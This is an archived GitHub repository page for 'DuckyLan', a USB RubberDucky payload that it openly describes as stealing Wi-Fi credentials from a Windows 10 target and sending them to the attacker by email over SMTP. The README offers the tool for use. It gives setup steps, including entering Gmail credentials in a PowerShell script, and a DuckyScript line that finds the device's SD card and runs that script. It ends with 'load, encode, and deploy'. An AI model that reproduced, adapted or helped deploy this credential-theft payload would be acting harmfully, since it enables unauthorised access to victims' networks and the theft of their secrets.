Skip to content
This repository has been archived by the owner on Oct 28, 2023. It is now read-only.
/ DuckyLan Public archive

A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP

License

Notifications You must be signed in to change notification settings

PrettyBoyCosmo/DuckyLan

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

DuckyLan SMTP

Blue Cosmo


________                 __           .____                   
\______ \  __ __   ____ |  | _____.__.|    |   _____    ____  
 |    |  \|  |  \_/ ___\|  |/ <   |  ||    |   \__  \  /    \ 
 |    `   \  |  /\  \___|    < \___  ||    |___ / __ \|   |  \
/_______  /____/  \___  >__|_ \/ ____||_______ (____  /___|  /
        \/            \/     \/\/             \/    \/     \/

Overview:

A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP.

Resources:

Requirements:

  • Twin-Duck firmware
  • Gmail account
    • i suggest making a separate Gmail account for this payload
    • your Gmail must have LSA Access enabled
  • Windows 10 Target

Instructions:

Set-Up/Installation

  1. change Gmail credentials in p.ps1
# gmail credentials
$email = "example@gmail.com"
$password = "password"
  1. in line 15 of payload.txt, change 'W' to the name of your ducky [SD Card]
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'W'}|select name;cd $u.name;./p.ps1;exit
  1. flash Twin-Duck firmware on to your duck
  2. load, encode, and deploy!!

#projects #malware

About

A USB RubberDucky payload that steals Wi-Fi credentials and sends them to the attacker via STMP

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published